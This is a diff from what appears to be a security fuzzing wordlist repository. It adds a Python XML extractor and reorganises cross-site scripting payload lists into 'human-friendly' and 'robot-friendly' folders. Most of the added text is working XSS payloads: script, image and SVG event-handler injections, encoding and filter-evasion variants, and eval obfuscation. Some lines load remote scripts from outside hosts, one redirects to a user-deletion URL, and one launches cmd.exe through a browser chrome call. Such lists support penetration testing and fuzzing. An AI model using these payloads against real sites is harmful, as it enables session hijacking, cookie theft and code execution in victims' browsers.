diff --git a/.bin/README.md b/.bin/README.md index 4dd41a18..fb8babaf 100644 --- a/.bin/README.md +++ b/.bin/README.md @@ -13,3 +13,7 @@ e.g. target dir is `Passwords/Common-Credentials` and suffix is `-without-curse- `os-names-mutate.py` mutates `Fuzzing/os-names.txt` to include possible mutations of OS names in a url. By default this script outputs the results in `Fuzzing/os-names-mutated.txt` + +- - - + +`xml-parser.py` parses xml files given as arguments and extracts hardcoded tags. It's meant to be modified as per file basis as every xml file format is unique. \ No newline at end of file diff --git a/.bin/xml-parser.py b/.bin/xml-parser.py new file mode 100755 index 00000000..f5dd9b19 --- /dev/null +++ b/.bin/xml-parser.py @@ -0,0 +1,41 @@ +#!/usr/bin/python3 + +import os +import sys +import xml.etree.ElementTree as et + +if len(sys.argv) == 1: + exit(0) + +files=sys.argv[1].split(" ") + +for i in files: + if not os.path.isfile(i): + print("[!] %s does not exist!"%(i)) + exit(2) + +for i in files: + xml_file = et.parse(i) + + contents = [] + + for j in xml_file.getroot().findall("attack"): + xss = j.find('code').text + + if not xss: + continue + + if "\n" in xss: + print("Xss have newline in it.") + print(xss, "\n") + + contents.append(xss) + + file_dir, file_name = i.rsplit("/", 1) + file_name = os.path.join(file_dir, file_name.rsplit(".", 1)[0] + ".txt") + + open(file_name, "w").write("\n".join(contents)) + + print(f"Wrote to {file_name}") + + \ No newline at end of file diff --git a/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt b/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt index 7865f8fe..edebeb84 100644 --- a/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt +++ b/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt @@ -111,3 +111,4 @@ GIF89a/*right click me! +

\ No newline at end of file diff --git a/Fuzzing/XSS/XSS-EnDe-evation.txt b/Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-evation.txt rename to Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt diff --git a/Fuzzing/XSS/XSS-EnDe-h4k.xml b/Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-h4k.xml rename to Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml diff --git a/Fuzzing/XSS/XSS-EnDe-mario.xml b/Fuzzing/XSS/human-friendly/XSS-EnDe-mario.xml similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-mario.xml rename to Fuzzing/XSS/human-friendly/XSS-EnDe-mario.xml diff --git a/Fuzzing/XSS/XSS-EnDe-xssAttacks.xml b/Fuzzing/XSS/human-friendly/XSS-EnDe-xssAttacks.xml similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-xssAttacks.xml rename to Fuzzing/XSS/human-friendly/XSS-EnDe-xssAttacks.xml diff --git a/Fuzzing/XSS/XSS-payloadbox.txt b/Fuzzing/XSS/human-friendly/XSS-payloadbox.txt similarity index 100% rename from Fuzzing/XSS/XSS-payloadbox.txt rename to Fuzzing/XSS/human-friendly/XSS-payloadbox.txt diff --git a/Fuzzing/XSS/robot-friendly/README.md b/Fuzzing/XSS/robot-friendly/README.md index 4a7526df..1a3d5229 100644 --- a/Fuzzing/XSS/robot-friendly/README.md +++ b/Fuzzing/XSS/robot-friendly/README.md @@ -10,4 +10,66 @@ Some XSS trigger condition may require you to interact with the web pages to tri To see the results, look out for message popups or network activity in the devtools of your browser. -Happy hacking! \ No newline at end of file +Happy hacking! + +## Removed xss + +### XSS-EnDe-h4k.txt + +Removed because there was no way to squash it into one line + +``` +_ += +eval +b=1 +__ += +location +c=1 +_ +( +__ +. +hash +// +. +substr +(1) +) +``` +### XSS-EnDe-xssAttacks.txt + +Also removed due to it's multiline nature + +``` + +``` diff --git a/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt b/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt index 8c78ffbd..edebeb84 100644 --- a/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt +++ b/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt @@ -110,4 +110,5 @@ GIF89a/*right click me! \ No newline at end of file +right click me! +

\ No newline at end of file diff --git a/Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt b/Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt new file mode 100644 index 00000000..fd2e4a26 --- /dev/null +++ b/Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt @@ -0,0 +1,164 @@ +"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐＂＇，舧艠︐︑--> +"'> +"'> +"'> +"'> +"'> +"'> +"'> +"'> +"'><\script>confirm(42) +"'>confirm(42) +"'>confirm(42) +"'> +"'>alert(42) +"'><;(24)trela=daolno ;''=e>'=d +"'><;(24)trela=daolno ;''=/e>'=d +"'> +"'>confirm(42) +"'%3e%3cscript%3econfirm(42)%3c/script%3e +"'%253e%253cscript%253econfirm(42)%253c/script%253e +"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +%22%27%3e%3cscript%3econfirm(42)%3c/script%3e +%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e +%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e +%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +"'> +"'ܾܼscriptܾalert(42)ܼܯscriptܾ +"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +javascript:alert(42) +javascript:prompt(42) +javascript:confirm(42) +jAvasCript:confirm(42) +jAvas\Cript:confirm(42) +jAvas Cript:confirm(42) +jAvas/* */Cript:confirm(42) + javascript:alert(42) +document +document. +top +top. +top[ +eval +eval( +cookie +.cookie +onerror +onerror= +onclick +onclick= +onmouseover +onmouseover= +onload +onload= +"onerror +"onerror= +"onclick +"onclick= +"onmouseover +"onmouseover= +"onload +"onload= +href= +src= +link= +style= +alt= +title= +egal= +"href= +"src= +"link= +"style= +"alt= +"title= +"egal= + +

+ +a=%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3edocument.write(unescape(a..b)) +

+

+

+

+ +

+Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser + +

+exp/* +

+

+ +XSS +s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 +s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; +s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; +s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; +s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; +s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; +
+XSS +%0da=eval;b=alert;a(b(/d/.source)); +test ++alert(0)+ + + +

+"> +%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// + + + +XSS +

+ style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" + sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar#xss)" a=" + +b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name +a=/ev/// .source a+=/al/// .source a[a] (name) +a=/ev/ .source a+=/al/ .source,a = a[a] a(name) +setTimeout// +(name// ,0) +navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) + + + +MOVE MOUSE OVER THIS AREA +perl -e 'print "

";'> out +perl -e 'print "&alert("XSS")";' > out + +#115;cript:alert('XS;S')> +#x63ript:&#x61lert(&#x27XSS')> +#0000118as&#0000099ri&#0000112t:&#0000097le&#0000114t(&#0000039XS&#0000083')> +>"'> +(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) +ev+<_>al](''+<_>aler+<_>t+<_>(1)); +s1=~~evalalerta(1)a~~,s2=+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a) +o={x:''+~~eva~~+l,y:''+~~aler~~+t+~~(1)~~};function f() { 0[this.x](this.y) }f.call(o); +___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___) +

+

+a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d); +XSS +open(name) +alert("XSS")'); ?> +alert(1) +XSS + +res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 + + + +a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1)) +a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b)) +eval.call(this,unescape.call(this,location)) +d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b))) +l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a +_=eval,__=unescape,___=document.URL,_(__(___)) +$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) +$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($)) +evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod) +with(location)with(hash)eval(substring(1)) +

+ + + + + + + + + +} +>"' +a=alert;a(0) +A=alert;A(1) +

+

+MOVE MOUSE OVER THIS AREA +'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +http://aa"> +http://aa'> +>%22%27> \ No newline at end of file diff --git a/Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.txt b/Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.txt new file mode 100644 index 00000000..49a0cb68 --- /dev/null +++ b/Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.txt @@ -0,0 +1,52 @@ +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");}alert(6);function xss(){// +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");} +'';!--"=&{(alert(1))} +"> +'> +' +

+ +`> +
MOVE MOUSE OVER THIS AREA +
MOVE MOUSE OVER THIS AREA +} +;}alert(0);{ +"+alert(0)+" +xyz onerror=alert(6); +onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +a=eval;b=alert;a(b(8)); +a=1;a=eval;b=alert;a(b(11));// +';//%0da=eval;b=alert;a(b(9));// +";//%0da=eval;b=alert;a(b(10));// +'};a=eval;b=alert;a(b(13));// +"};a=eval;b=alert;a(b(12));// +1};a=eval;b=alert;a(b(14));// +'];a=eval;b=alert;a(b(15));// +"];a=eval;b=alert;a(b(16));// +1];a=eval;b=alert;a(b(17));// +1;a=eval;b=alert;a(b(/c/.source)); +%0da=eval;b=alert;a(b(/d/.source)); +*/a=eval;b=alert;a(b(/e/.source));/* + +">< +< +> +000%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s> +"> +"> +"> +vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83))) +" style="color: expression(alert(0));" a=" + + +" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" +" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar#xss)" a=" +%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/ +c%00"" +BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")} +x=alert;x(%26%2340 /finally through!/.source %26%2341); +%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// +http://aa \ No newline at end of file diff --git a/Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.txt b/Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.txt new file mode 100644 index 00000000..9999feb0 --- /dev/null +++ b/Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.txt @@ -0,0 +1,109 @@ +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{} +'';!--"=&{()} + + + + + + + +
+
+
+ + + + + + + + +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +exp/* +
XSS + + + +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE + + + + + + + +a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d); + + + + + + + + + + +
+
+XSS +]]> + + + + + + + + +alert("XSS")'); ?> +
+<%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C + + + + + + +
+ + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +\";alert('XSS');// + + + + + + +perl -e 'print "";'> out +perl -e 'print "&alert("XSS")";' > out + + + + +"> + + + + + + +PT SRC="http://ha.ckers.org/xss.js"> + +XSS +XSS +XSS +XSS +XSS +XSS +XSS +XSS +XSS +XSS +XSS +XSS +XSS +XSS \ No newline at end of file diff --git a/Fuzzing/XSS/robot-friendly/XSS-payloadbox.txt b/Fuzzing/XSS/robot-friendly/XSS-payloadbox.txt new file mode 100644 index 00000000..3c3252d3 --- /dev/null +++ b/Fuzzing/XSS/robot-friendly/XSS-payloadbox.txt @@ -0,0 +1,2690 @@ +"-prompt(8)-" +'-prompt(8)-' +";a=prompt,a()// +';a=prompt,a()// +'-eval("window['pro'%2B'mpt'](8)")-' +"-eval("window['pro'%2B'mpt'](8)")-" +"onclick=prompt(8)>"@x.y +"onclick=prompt(8)> + + + + +t> +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +\x3Cscript>javascript:alert(1) +'"`> + + +--> --> +--> +--> +--> +`"'>
+test +test +test +test +test +test +test +test +test +test +test +test +test +test + + + + + + + +"'`>ABC
DEF +"'`>ABC
DEF +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E + + + +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> + + + + +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> + + +